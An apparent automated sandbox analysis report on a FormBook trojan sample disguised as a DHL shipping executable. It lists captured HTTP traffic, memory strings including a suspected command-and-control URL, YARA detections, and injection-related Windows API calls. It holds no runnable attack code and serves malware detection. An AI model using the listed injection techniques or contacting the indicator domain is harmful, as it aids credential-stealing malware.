2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 13:35:25 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 13:35:28 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Source: EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000002.3912815274.0000000003013000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com
Source: EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000002.3912815274.0000000003013000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com/fo8o/
Source: netbtugc.exe, 00000004.00000003.1790735636.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: netbtugc.exe, 00000004.00000003.1790735636.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 00000004.00000003.1790735636.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netbtugc.exe, 00000004.00000003.1790735636.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 00000004.00000002.3914997202.0000000004572000.00000004.10000000.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000002.3913740733.0000000004362000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: netbtugc.exe, 00000004.00000002.3914997202.0000000004572000.00000004.10000000.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000002.3913740733.0000000004362000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: netbtugc.exe, 00000004.00000003.1790735636.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 00000004.00000003.1790735636.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 00000004.00000003.1790735636.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netbtugc.exe, 00000004.00000002.3911989636.0000000002AE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netbtugc.exe, 00000004.00000002.3911989636.0000000002AE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netbtugc.exe, 00000004.00000003.1787312002.00000000079BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: netbtugc.exe, 00000004.00000002.3911989636.0000000002AE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netbtugc.exe, 00000004.00000002.3911989636.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: netbtugc.exe, 00000004.00000002.3911989636.0000000002AE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: netbtugc.exe, 00000004.00000002.3911989636.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: netbtugc.exe, 00000004.00000003.1790735636.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: netbtugc.exe, 00000004.00000002.3914997202.0000000004BBA000.00000004.10000000.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000002.3913740733.00000000049AA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.empowermedeco.com/fo8o/?bp=mxnR
Source: netbtugc.exe, 00000004.00000003.1790735636.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: netbtugc.exe, 00000004.00000002.3916872094.0000000006120000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3914997202.000000000424E000.00000004.10000000.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000002.3913740733.000000000403E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
Source: EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000002.3913740733.000000000403E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_0021EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0021EAFF

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_0021ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0021ED6A

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

0_2_0021EAFF

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_0020AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0020AA57

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_00239576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00239576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1603244254.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1602875131.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3911918141.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3911851240.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3912815274.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3911205481.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3913125280.0000000003930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1603846047.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1603244254.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1602875131.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3911918141.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3911851240.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3912815274.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3911205481.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3913125280.0000000003930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1603846047.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: DHL 8350232025-1.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: DHL 8350232025-1.exe, 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f98fe277-a
Source: DHL 8350232025-1.exe, 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_ec841d26-c
Source: DHL 8350232025-1.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_81494a9d-6
Source: DHL 8350232025-1.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_0aca5257-8

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042B363 NtClose,	2_2_0042B363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72B60 NtClose,LdrInitializeThunk,	2_2_03B72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03B72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03B72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk,	2_2_03B735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B74340 NtSetContextThread,	2_2_03B74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B74650 NtSuspendThread,	2_2_03B74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72BA0 NtEnumerateValueKey,	2_2_03B72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72B80 NtQueryInformationFile,	2_2_03B72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72BF0 NtAllocateVirtualMemory,	2_2_03B72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72BE0 NtQueryValueKey,	2_2_03B72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72AB0 NtWaitForSingleObject,	2_2_03B72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72AF0 NtWriteFile,	2_2_03B72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72AD0 NtReadFile,	2_2_03B72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72FB0 NtResumeThread,	2_2_03B72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72FA0 NtQuerySection,	2_2_03B72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72F90 NtProtectVirtualMemory,	2_2_03B72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72FE0 NtCreateFile,	2_2_03B72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72F30 NtCreateSection,	2_2_03B72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72F60 NtCreateProcessEx,	2_2_03B72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72EA0 NtAdjustPrivilegesToken,	2_2_03B72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72E80 NtReadVirtualMemory,	2_2_03B72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72EE0 NtQueueApcThread,	2_2_03B72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72E30 NtWriteVirtualMemory,	2_2_03B72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72DB0 NtEnumerateKey,	2_2_03B72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72DD0 NtDelayExecution,	2_2_03B72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72D30 NtUnmapViewOfSection,	2_2_03B72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72D10 NtMapViewOfSection,	2_2_03B72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72D00 NtSetInformationFile,	2_2_03B72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72CA0 NtQueryInformationToken,	2_2_03B72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72CF0 NtOpenProcess,	2_2_03B72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72CC0 NtQueryVirtualMemory,	2_2_03B72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72C00 NtQueryInformationProcess,	2_2_03B72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72C60 NtCreateKey,	2_2_03B72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B73090 NtSetValueKey,	2_2_03B73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B73010 NtOpenDirectoryObject,	2_2_03B73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B739B0 NtGetContextThread,	2_2_03B739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B73D10 NtOpenProcessToken,	2_2_03B73D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B73D70 NtOpenThread,	2_2_03B73D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D4340 NtSetContextThread,LdrInitializeThunk,	4_2_030D4340
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D4650 NtSuspendThread,LdrInitializeThunk,	4_2_030D4650
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2B60 NtClose,LdrInitializeThunk,	4_2_030D2B60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_030D2BA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_030D2BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_030D2BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2AD0 NtReadFile,LdrInitializeThunk,	4_2_030D2AD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2AF0 NtWriteFile,LdrInitializeThunk,	4_2_030D2AF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2F30 NtCreateSection,LdrInitializeThunk,	4_2_030D2F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2FB0 NtResumeThread,LdrInitializeThunk,	4_2_030D2FB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2FE0 NtCreateFile,LdrInitializeThunk,	4_2_030D2FE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_030D2E80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_030D2EE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_030D2D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_030D2D30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2DD0 NtDelayExecution,LdrInitializeThunk,	4_2_030D2DD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_030D2DF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2C60 NtCreateKey,LdrInitializeThunk,	4_2_030D2C60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_030D2C70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_030D2CA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D35C0 NtCreateMutant,LdrInitializeThunk,	4_2_030D35C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D39B0 NtGetContextThread,LdrInitializeThunk,	4_2_030D39B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2B80 NtQueryInformationFile,	4_2_030D2B80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2AB0 NtWaitForSingleObject,	4_2_030D2AB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2F60 NtCreateProcessEx,	4_2_030D2F60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2F90 NtProtectVirtualMemory,	4_2_030D2F90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2FA0 NtQuerySection,	4_2_030D2FA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2E30 NtWriteVirtualMemory,	4_2_030D2E30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2EA0 NtAdjustPrivilegesToken,	4_2_030D2EA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2D00 NtSetInformationFile,	4_2_030D2D00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2DB0 NtEnumerateKey,	4_2_030D2DB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2C00 NtQueryInformationProcess,	4_2_030D2C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2CC0 NtQueryVirtualMemory,	4_2_030D2CC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D2CF0 NtOpenProcess,	4_2_030D2CF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D3010 NtOpenDirectoryObject,	4_2_030D3010
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D3090 NtSetValueKey,	4_2_030D3090
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D3D10 NtOpenProcessToken,	4_2_030D3D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D3D70 NtOpenThread,	4_2_030D3D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02567A70 NtReadFile,	4_2_02567A70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02567B50 NtDeleteFile,	4_2_02567B50
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02567BE0 NtClose,	4_2_02567BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02567920 NtCreateFile,	4_2_02567920
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02567D30 NtAllocateVirtualMemory,	4_2_02567D30

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_0020D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0020D5EB

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_00201201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00201201

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_0020E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0020E8F6

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_00212046	0_2_00212046
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001A8060	0_2_001A8060
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_00208298	0_2_00208298
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001DE4FF	0_2_001DE4FF
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001D676B	0_2_001D676B
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_00234873	0_2_00234873
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001CCAA0	0_2_001CCAA0
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001ACAF0	0_2_001ACAF0
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001BCC39	0_2_001BCC39
